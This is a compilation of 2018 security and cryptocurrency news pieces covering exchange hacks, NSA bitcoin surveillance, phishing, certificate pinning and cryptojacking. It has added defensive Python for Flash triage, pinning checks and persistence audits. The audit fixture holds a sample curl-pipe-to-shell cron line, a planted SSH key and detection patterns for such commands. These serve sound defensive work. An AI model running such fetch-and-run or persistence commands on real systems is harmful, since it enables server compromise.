Snowden Releases NSA Documents Showing Bitcoin Was “#1 Priority”

By: C Edward Kelso

Xkeyscore. MAC addresses. OAKSTAR. MONKEYROCKET. Edward Snowden is at it again. This time the world’s most notorious whistleblower has handed National Security Agency (NSA) documentation to the online investigative news outlet The Intercept, revealing an invasive covert program to track bitcoin users with the same spy tools he first exposed during his infamous initial disclosures. The implications range from the future of financial privacy to whether warrantless data collection was used to prosecute bitcoiners such as Ross Ulbricht of Silk Road.

Snowden Reveals How NSA Tracked Bitcoin Users

Ever get the feeling you’re being watched? Department of Homeland Security (DHS) Acting Assistant Secretary for Legislative Affairs Brian de Vallance, in a November 2013 letter to Congress, worried that “with the advent of virtual currencies and the ease with which financial transactions can be exploited by criminal organizations, DHS has recognized the need for an aggressive posture toward this evolving trend.” Infamous whistleblower Edward Snowden seems to have found a trove of heavily redacted, classified NSA documents attesting to that “aggressive posture.”

It’s fitting Mr. Snowden should share them with The Intercept, an online investigative news organization founded by his benefactor, attorney turned journalist Glenn Greenwald. Mr. Greenwald was then writing for The Guardian, and the two unleashed the largest batch of government security documents ever revealed about US and UK global surveillance.


Interestingly, the documents tracking bitcoin users stem from roughly the same period, 2013. They detail how bitcoiners all over the world were targeted as the powers granted to the NSA under the rubric of fighting terrorism expanded, and the data may even have played a role in early crypto prosecutions such as that of Ross Ulbricht and Silk Road.

American Civil Liberties Union’s Patrick Toomey, of its National Security Project, explained, “If the government’s criminal investigations secretly relied on NSA spying, that would be a serious concern. Individuals facing criminal prosecution have a right to know how the government came by its evidence, so that they can challenge whether the government’s methods were lawful. That is a basic principle of due process. The government should not be hiding the true sources for its evidence in court by inventing a different trail.”



Email Fraud is a Top Business Risk for 2018

By: Phee Waterfield

Email fraud is a top risk for 2018, resulting in employee termination.

Reports from Proofpoint and Clearswift show that businesses across the globe are concerned about email phishing campaigns.

Today, two reports highlight that email phishing is a top concern for global businesses. However, a third of employees believe it is lack of support from execs that is the biggest challenge to protection – demonstrating a disconnect between the board and IT.

Proofpoint’s 2018 Understanding Email Fraud Survey asked 2250 senior IT decision makers across the US, UK, France, Germany and Australia for their email fraud experiences from the last two years. The results found 75% of organizations had experienced at least one targeted email fraud attack, with 41% suffering multiple attempts in the last two years.

Concerningly, more than 77% of businesses expect they will fall victim to email fraud in the next 12 months, and only 40% have full visibility into email threats.

“Email fraud is highly pervasive and deceptively simple; hackers don’t need to include attachments or URLs, emails are distributed in fewer volumes, and typically impersonate people in authority for maximum impact,” said Robert Holmes, vice-president of email security products for Proofpoint. “These and other factors make email fraud, also known as business email compromise (BEC), extremely difficult to detect and stop with traditional security tools. Our research underscores that organizations and boardrooms have a duty to equip the entire workforce with the necessary solutions and training to protect everyone against this growing threat.”

Clearswift also identified that UK organizations were concerned about ex-employees retaining access to business networks and human error.


Infographic: How to safely buy and sell cryptocurrency

By: Brandon Vigliarolo

Cryptocurrency exchange hacks and thefts have been regular news since Bitcoin went big, but that hasn’t deterred investors: the number of digital cryptocurrency wallets in existence by the end of 2017 was 21.5 million, a huge increase from 2015, when only 5.4 million wallets were around.

Along with the new popularity of cryptocurrency has come a new breed of cryptocurrency criminals. In 2016 $95 million worth of Bitcoin was stolen, and in 2017 the amount stolen exploded: $115 million was lost to phishing, $103 million to exploitation of software and storage, $7.4 million to hacks, and $4,000 to Ponzi schemes.

That’s a lot of lost cryptocurrency—so how are criminals doing it?

Five ways cryptocurrency gets stolen

There are five popular ways that cryptocurrency criminals get their hands on your virtual coins:

  • Brute forcing, in which an attacker simply tries again and again to guess a password until they finally get in.
  • Phone porting, in which criminals call cellular customer service, have a number transferred to their phone, and use the number to reset a crypto account password.
  • Phishing, in which a fake login page harvests exchange credentials, or a malicious attachment installs malware that hunts for wallet files and keys (or swaps the destination address when the victim pastes one).
  • Ponzi schemes, in which investors are paid returns that are actually just the money new investors put in (see BitConnect).
  • Mining malware, which uses a victim’s computer to do the mining for the hacker.

So, risks come from all angles: anonymous hackers on the internet, fake exchanges that run away with your money, or even malware that makes you do the work for someone else’s gain.

That doesn’t mean safe investment isn’t possible.

How to safely invest in cryptocurrency

Cryptocurrency brokerage CryptoGo has some tips for investing in cryptocurrency without placing yourself in harm’s way.

  • Encrypt and back up safely so that you always have a record of your wallet. Use a mnemonic phrase to ensure you can recover a lost wallet.
  • Use an antivirus product that was built with cryptocurrency in mind, such as Spybot Anti-Beacon or Comodo.
  • Only use “hot wallets,” those that are connected to the internet, for small transactions. If you’re going to store large amounts of cryptocurrency for long-term investment keep them in a secure, offline wallet.
  • Use multifactor authentication, either through a hardware token or an app, to secure cryptocurrency-related accounts.
  • Don’t use SMS authentication—phone numbers can be stolen via phone porting.
  • Diversify your holding through different exchanges and use different passwords and recovery methods for each one.


Bitgrail to Refund Hack Victims with Newly Created BGS Tokens

By: Samuel Haig

Bitgrail has denied responsibility for the recent hack that saw the theft of 17 million XRB, or Nano, in comments made in a Telegram group for victims of the hack. Despite rejecting responsibility for the incident, the exchange states that it will “voluntarily” refund users through the creation and issuance of BGS tokens.

Bitgrail Operator Denies Responsibility for Hack

A document prepared by the operator of Bitgrail, Francesco “The Bomber” Firano, has been the subject of widespread reporting, following its dissemination to members of a Telegram group comprised of victims of Bitgrail’s hack.

A translated summary of the document has been made available by the Telegram group, as Mr. Firano apparently “did not want […] the whole doc[ument]” shared. The release of the translated document was approved by Mr. Firano.

The summary states that Bitgrail “plans [to] reopen soon,” adding that the date on which it will re-launch “will be announced soon.” The document also asserts that Bitgrail “still sees themselves as not responsible for the theft and therefore they believe they have no obligation to refund stolen coins”.

Bitgrail to Refund Users with BGS Tokens

Bitgrail states that “on reopen […] all non-nano funds will be available and withdrawable, nano balance will be set to 20% of what it was before.” In order to repay the remaining 80% of nano balances, Bitgrail states that it will “voluntarily” introduce a new token called BGS (Bitgrail Shares), which will be distributed to victims of the hack. Bitgrail claims that it will then purchase back the BGS tokens at a rate of “$10.50 USD” per token, with purchases set to take place at the end of each month. The summary states that Bitgrail will use half of its monthly profits to conduct the purchases.

Participation in the company’s “voluntar[y]” refund comes with a stipulation, however, as customers of the “platform after reopen will [be] requir[ed] to sign a ‘waiver of all rights for legal action.’”


Sofacy Targets Government Agency with New Spear-Phishing Campaign

By: Phee Waterfield

The Sofacy group, also known as APT28 and Fancy Bear, has carried out an attack on an unnamed European government agency using an updated variant of DealersChoice.

Details of the attack, published by Unit 42, part of Palo Alto Networks, describe the espionage group using .docx files titled “Defence & Security 2018 Conference Agenda,” whose content appears to have been copied directly from the website of the “Underwater Defence & Security 2018 Conference.”

Back in October 2016, Unit 42 published an initial analysis of DealersChoice, a Flash exploitation framework used by the Sofacy group. Those attacks used Microsoft Word delivery documents containing Adobe Flash objects capable of loading additional malicious Flash objects, either embedded in the file or supplied directly by a command and control server. Sofacy continued to use DealersChoice throughout the fall of 2016, as documented in December 2016.

However, the attacks that took place on March 12 and 14 used a different variation of the spear-phishing attack, something not seen from Sofacy before.

Unlike in the fall of 2016, the Flash object in the document is only loaded if the user scrolls through the entire delivery document and views the specific page the Flash object is embedded in, a condition that an automated sandbox which opens the file but never scrolls it will not meet. Only then does the object contact an active C2 server to download an additional Flash object containing the exploit code.
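A defender receiving documents like the one described above wants a quick way to tell whether a .docx carries Flash at all, before any dynamic analysis. The script below is an added example, not Unit 42’s tooling or anything recovered from the Sofacy samples. It assumes two things: that Word stores an embedded Flash control as an ActiveX part (word/activeX/activeXN.xml) whose classid is the public Shockwave Flash CLSID, and that a raw .swf dropped into the package starts with the FWS, CWS or ZWS signature. The document it scans is constructed in memory; nothing here is a real malicious sample.

```python
"""Static triage of a .docx for embedded Flash content.

Added example, not Unit 42's code. The sample package is built in memory and
only mimics the structure Word uses for an ActiveX part and an embedded file.
"""
import io
import re
import zipfile
from typing import List

FLASH_CLSID = "D27CDB6E-AE6D-11CF-96B8-444553540000"   # "Shockwave Flash Object" ActiveX control
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")                    # uncompressed, zlib, LZMA SWF headers
CLSID_RE = re.compile(
    r'classid="\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?"')


def find_flash_indicators(docx_bytes: bytes) -> List[str]:
    """Return one finding per suspicious package part; an empty list means nothing was found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            # 1. An ActiveX part whose classid is the Flash control.
            if name.startswith("word/activeX/") and name.endswith(".xml"):
                for clsid in CLSID_RE.findall(data.decode("utf-8", "replace")):
                    if clsid.upper() == FLASH_CLSID:
                        findings.append(f"{name}: ActiveX control is Shockwave Flash")
            # 2. Any part that is itself a SWF file (e.g. under word/embeddings/).
            if data[:3] in SWF_MAGICS:
                findings.append(f"{name}: part is a SWF file ({data[:3].decode()})")
    return findings


def build_sample_docx(with_flash: bool) -> bytes:
    """Constructed minimal OOXML package, with or without the two indicators above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/'
                    'package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body><w:p><w:r><w:t>Defence &amp; Security 2018 Conference Agenda</w:t>'
                    '</w:r></w:p></w:body></w:document>')
        if with_flash:
            zf.writestr("word/activeX/activeX1.xml",
                        '<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" '
                        'ax:classid="{D27CDB6E-AE6D-11cf-96B8-444553540000}" '
                        'ax:persistence="persistStreamInit"/>')
            zf.writestr("word/embeddings/payload.swf", b"CWS\x0f" + b"\x00" * 32)  # fake SWF header
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_flash_indicators(build_sample_docx(with_flash=True)):
        print(hit)
```

This is a presence check, not a verdict: a benign document can legitimately embed Flash, and a packer can hide the SWF inside the ActiveX control’s binary stream where the magic bytes are not at the start of the part. Treat a hit as a reason to scroll the whole document in an instrumented sandbox, which is exactly the behaviour the scroll-triggered loader is designed to avoid.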


How Secure Is Your Online Banking App?

By: Sarah Vonnegut

When it comes to developing applications that handle such sensitive information, making sure security is baked into every step of the SDLC is crucial.


Banking has gone digital. Nearly every major bank offers both an online portal as well as a mobile app, and people seem to prefer it that way. A recent PwC survey found that 46% of consumers only use online banking, a massive jump from their previous survey in 2012, in which only 27% used online banking exclusively.

For banks and other financial institutions, those numbers make offering an app for online or mobile banking a necessity. Users crave the convenience that comes with banking on the go, and while the advantages of being able to do personal banking from a phone or computer are undeniable, one question persists: just how secure are these online banking apps?

Research released at the end of 2017 may offer an answer. Carried out at the University of Birmingham, it found security issues in mobile banking apps that could leave millions of users open to attack. The main issue involved certificate pinning: the affected apps pinned the server certificate but did not verify that the certificate’s hostname matched the server they were talking to, and because the pinning check passed, standard tests were failing to detect “a serious vulnerability that could let attackers take control of a victim’s online banking,” The Register said.
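The mistake is easy to see in code once the two checks are separated. The block below is an added example, not the Birmingham team’s tool and not any bank’s code. A pin is modelled as a SHA-256 over a public key (here the issuing CA’s SubjectPublicKeyInfo), and the hostname check compares the certificate’s DNS Subject Alternative Names against the host being contacted using RFC 6125 wildcard rules. The certificates are constructed dicts carrying only those two fields; real code would pull them out of the TLS handshake.

```python
"""Certificate pinning without, and then with, hostname verification.

Added example, not the University of Birmingham tool or any bank's code.
BANK_CA_SPKI stands in for DER bytes; the certificate dicts are constructed.
"""
import hashlib
import hmac
from typing import Dict, List


def spki_pin(spki_der: bytes) -> str:
    """Pin value: hex SHA-256 of the DER-encoded SubjectPublicKeyInfo."""
    return hashlib.sha256(spki_der).hexdigest()


def hostname_matches(san_dns: List[str], hostname: str) -> bool:
    """RFC 6125-style match: exact label-by-label comparison, or a wildcard that is the
    whole leftmost label, consumes exactly one label, and is not used directly under a
    top-level domain (so '*.test' never matches anything)."""
    host_labels = hostname.lower().rstrip(".").split(".")
    for name in san_dns:
        pat_labels = name.lower().rstrip(".").split(".")
        if "*" not in name:
            if pat_labels == host_labels:
                return True
            continue
        if pat_labels[0] != "*" or any("*" in lbl for lbl in pat_labels[1:]):
            continue                                    # wildcard only as the entire leftmost label
        if len(pat_labels) < 3:
            continue                                    # refuse *.tld
        if len(host_labels) == len(pat_labels) and host_labels[1:] == pat_labels[1:]:
            return True                                 # '*' matched exactly one label
    return False


def verify_pin_only(cert: Dict, pinned_spki: str) -> bool:
    """The flawed check: the pin matches, so the connection is trusted. Every certificate the
    pinned CA ever issued, for any hostname whatsoever, passes this."""
    return hmac.compare_digest(spki_pin(cert["issuer_spki_der"]), pinned_spki)


def verify_pin_and_host(cert: Dict, pinned_spki: str, hostname: str) -> bool:
    """The corrected check: the pin AND the hostname must both match."""
    return verify_pin_only(cert, pinned_spki) and hostname_matches(cert["san_dns"], hostname)


# --- constructed data -----------------------------------------------------------------
BANK_CA_SPKI = b"constructed-bank-ca-subject-public-key-info"   # placeholder for real DER bytes
PINNED = spki_pin(BANK_CA_SPKI)

BANK_CERT = {"issuer_spki_der": BANK_CA_SPKI,
             "san_dns": ["examplebank.test", "*.examplebank.test"]}
# Issued by the same CA but to an attacker-controlled name: the case pin-only accepts.
ATTACKER_CERT = {"issuer_spki_der": BANK_CA_SPKI,
                 "san_dns": ["attacker.test"]}

if __name__ == "__main__":
    host = "api.examplebank.test"
    print("pin only,     attacker cert:", verify_pin_only(ATTACKER_CERT, PINNED))
    print("pin and host, attacker cert:", verify_pin_and_host(ATTACKER_CERT, PINNED, host))
    print("pin and host, bank cert:    ", verify_pin_and_host(BANK_CERT, PINNED, host))
```

The test that catches this is not “does a self-signed certificate get rejected” (it does, the pin fails) but “does a certificate from the pinned CA for the wrong name get rejected”. A security review of a banking app should run that second case explicitly, because pinning makes the generic TLS tooling report success.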

It’s security issues like this that show just how important it is to cover all your bases when developing digital banking apps. While digital banking can help foster new connections and offer new and innovative services, thus bringing more gains for financial institutions, digital banking also carries plenty of risk.

7 Critical Steps for Banking App Developers

While consumers carry a burden of security that includes using secure wifi to access their banking app, locking their devices when not using them, using a unique password, and not using public computers to access their accounts, the main burden of ensuring customers’ security is on the banks. Or rather, the developers and teams working on the applications.

Developing an SDLC, or software development lifecycle, is vital to the continued development of secure applications. The SDLC will put in place a strategy for making sure security is built into the product, without slowing the development process down. Here are seven critical steps in the SDLC that developers and security teams should work together on to ensure the release of a secure online or mobile banking app.

1. Establish Security Requirements

The first step is to understand the security requirements of the banking app. Because of the sensitive nature of banking apps, it is important to assign at least one member of the security team to work with the build team – and this partnership needs to begin before development does.

During this part of the SDLC, development and security should identify the key security risks within the software, including what standards (both organizational and legal/regulatory) the software must follow. Stakeholders from both development and security teams should be identified to make sure communication is clear from the outset, and any gaps in the process should be noted. Only once security requirements have been established and agreed upon by all parties can development begin.


Cryptocurrency scammers run off with more than $2 million after ditching their investors


Scammers appear to have made off with more than $2 million in cryptocurrency after carrying out an apparent fake initial coin offering (ICO), and the individuals linked to the incident may be connected to another recent theft, CNBC has learned.

A bad actor or actors used a fake LinkedIn profile and copied pictures from another user’s Instagram to create a false persona — and successfully drew more than 1,000 investors into the ICO project, which was called Giza.

The Wild West world of ICOs

An initial coin offering or ICO is a way for start-ups to crowd-fund investment. Instead of raising cash from venture capitalists, a company can hold an ICO, which allows people to invest a cryptocurrency, such as ethereum or bitcoin, in exchange for a new token that’s issued by the start-up. The new digital coin is not equity. Instead, it can be used in exchange for future services offered by the company. It’s also possible that the new coin may climb to a much higher value than the initial investment.

There is big money in ICOs, and they are largely unregulated. Last year, companies raised $3.8 billion via ICOs, and this year alone they have already raised $2.8 billion, according to data from CoinSchedule, a site which tracks the activity in the space.

But ICOs are unregulated in most countries, meaning investors don’t have the protections that they enjoy with other assets such as stocks. However regulators are keeping a closer eye on ICO activity, amid a rising number of reports of scams.

What happened with Giza?

Investors who spoke to CNBC all described a common experience with the ICO in question: They thought the project was legitimate until warning signs began to appear, including a falling out with the company’s sole supplier, a lack of correspondence from its supposed founders, and failed attempts to recoup the lost funds.

The apparently well-orchestrated scam centers around a mysterious individual called Marco Fike, the COO of Giza. Among the eight investors, partners and former employees of Giza interviewed by CNBC, all claim they have never seen Marco Fike’s face.

The ICO was for a supposed start-up called Giza, which claimed to be developing a super-secure device that would allow people to store cryptocurrencies.

It carried out its ICO in January and drew investors for several weeks after. One person who put money into the project told CNBC that they invested ether that was equivalent to $10,000 at the time, and another said they had put in around $5,000 worth of ether.

At the beginning of February, Giza had raised and was holding more than 2,100 ethereum coins, which at the time were worth around $2.4 million. All but $16 worth of those ethereum coins are now missing.


Cryptojacking attack uses leaked EternalBlue NSA exploit to infect servers

By: Charlie Osborne

RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.

Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.

On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.

The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and “demonstrates a worm-like behavior combined with advanced exploits to increase the attackers’ infection rate and fatten their [operator] wallets.”

When a target server has been identified, the malware exploits CVE-2017-9805, an Apache Struts vulnerability which impacts the Struts REST plugin with XStream handler.

If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.

This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.

However, the downloader used is more sophisticated than usual: it gains persistence through new entries in crontab, gains remote access to the victim machine by adding its own public key to the SSH authorized_keys file, and modifies the system’s iptables rules.

Other packages are also downloaded using standard Linux package managers, and one particular GitHub tool, a TCP port scanner called masscan, is also included in the payload.
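The persistence described above leaves artefacts in two files that are cheap to audit. The script below is an added example, not Imperva’s tooling: it flags crontab lines that fetch and run code or execute from world-writable directories, and it fingerprints every authorized_keys entry (the same SHA256 form ssh-keygen -lf prints) so anything not on an allowlist stands out. The sample crontab and authorized_keys contents are constructed, and the key blobs are deterministic junk bytes rather than real keys. The iptables changes the article mentions need iptables -S output and are not covered here.

```python
"""Audit crontab and authorized_keys text for cryptominer-style persistence.

Added example, not Imperva's code. All sample data below is constructed.
"""
import base64
import hashlib
import re
from typing import List, Set, Tuple

SUSPICIOUS_CRON = [
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), "download piped straight into a shell"),
    (re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*(/tmp|/dev/shm|/var/tmp)/"),
     "download written to a world-writable directory"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+"), "command run from a world-writable directory"),
]


def audit_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (line, reason) for every non-comment crontab line that trips a rule."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_CRON:
            if pattern.search(stripped):
                hits.append((stripped, reason))
                break                                   # one reason per line is enough for triage
    return hits


def ssh_fingerprint(key_line: str) -> str:
    """SHA256 fingerprint of one authorized_keys line, formatted like `ssh-keygen -lf`.
    Skips any leading options (e.g. command="...") by locating the key-type token."""
    parts = key_line.split()
    for i, token in enumerate(parts):
        if token.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(parts):
            digest = hashlib.sha256(base64.b64decode(parts[i + 1])).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("no public key found on line")


def audit_authorized_keys(text: str, known: Set[str]) -> List[Tuple[str, str]]:
    """Return (fingerprint, line) for every key whose fingerprint is not in `known`."""
    unknown = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fp = ssh_fingerprint(stripped)
        if fp not in known:
            unknown.append((fp, stripped))
    return unknown


# --- constructed sample data ----------------------------------------------------------
def _fake_blob(seed: bytes) -> str:
    """Base64 of deterministic junk standing in for a real key blob (constructed, not a key)."""
    return base64.b64encode(hashlib.sha256(seed).digest() * 2).decode()

_ADMIN_BLOB = _fake_blob(b"admin")
_MINER_BLOB = _fake_blob(b"miner")
ADMIN_KEY = "ssh-ed25519 " + _ADMIN_BLOB + " admin@bastion"
PLANTED_KEY = 'command="/tmp/.x/run" ssh-rsa ' + _MINER_BLOB + " root@localhost"
KNOWN_FINGERPRINTS = {ssh_fingerprint(ADMIN_KEY)}       # the allowlist an ops team maintains

SAMPLE_AUTHORIZED_KEYS = "\n".join(["# ops keys", ADMIN_KEY, PLANTED_KEY])
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://198.51.100.7/s.sh | sh
@reboot /tmp/.x/run >/dev/null 2>&1
"""

if __name__ == "__main__":
    for line, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"[cron] {reason}: {line}")
    for fp, line in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_FINGERPRINTS):
        print(f"[ssh] unknown key {fp}: {line}")
```

Run it against crontab -l output for every user plus /etc/crontab and /etc/cron.d/*, and against every authorized_keys file under /root and /home. The fingerprint allowlist is the important part: a planted key looks exactly like a legitimate one, and only a comparison against what you deliberately deployed tells them apart.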


Coincheck to Start Compensating Hack Victims and Resume Operations Next Week

By: Kevin Helms


Hacked Japanese exchange Coincheck is getting ready to start compensating its customers next week as it plans to resume operations. The exchange has been slapped with two business improvement orders so far by Japan’s financial regulator and may stop trading some cryptocurrencies for safety reasons.

Repayment Beginning Next Week

Major Japanese cryptocurrency exchange Coincheck announced on Thursday that it will start compensating customers next week, according to Nikkei. The exchange was hacked on January 26 and lost approximately 58 billion yen (~USD$550 million) worth of the cryptocurrency NEM, held by approximately 260,000 customers. The incident forced the company to suspend nearly all of its services.

Coincheck’s repayment plan revealed on Thursday is in line with the company’s announcement in February, according to COO Yusuke Otsuka. The exchange has promised to repay victims 88.549 yen for each of the NEM coins stolen, which is a total of 46 billion yen. However, some are criticizing this decision, demanding compensation of the full amount at the time of the hack.

The exchange is repaying victims in Japanese yen rather than in cryptocurrency, and says the funds will appear in customers’ accounts starting next week. Meanwhile, multiple lawsuits have already been filed against the company by victims seeking the return of their cryptocurrencies.

Method of Attack

The investigation by the Japan Exchange Group (NEC) and five financial security companies revealed that “the cause of the leakage is seen as a malware infection via email to employee PCs,” Oricon reported. Multiple Coincheck employees received the malware-laced email, Otsuka described. Once an infected link was clicked, the virus spread, leading to the NEM theft, Nikkei explained.

However, the COO cannot reveal whether the email originated from overseas or within Japan. “I am under investigation and I cannot reveal it,” the news outlet quoted him saying. Emphasizing that cryptocurrencies will be stored in cold wallets going forward, he detailed:


UK company linked to laundered Bitcoin billions

By: Geoff White

A UK company has been linked to the laundering of 650,000 stolen bitcoins worth £4.5bn, a BBC Radio 4 investigation has found.

The coins were taken by hackers from Tokyo-based Bitcoin exchange Mt Gox, leaving tens of thousands of customers out of pocket.

It’s not clear who is in control of the London-based firm Always Efficient LLP.

Mt Gox operator Mark Karpeles apologised to investors and said he was co-operating with the investigation.

The FBI has charged a Russian national with laundering the stolen bitcoins.

Mt Gox matched up those who wanted to buy the crypto-currency with dollars, pounds and other international denominations with those wanting to sell bitcoins, and handled an estimated 70% of the world’s Bitcoin trade.

The exchange was originally set up to trade cards from a game set in a world of wizards, spells and monsters. When it turned its focus to crypto-currencies, it appeared to be a huge success story.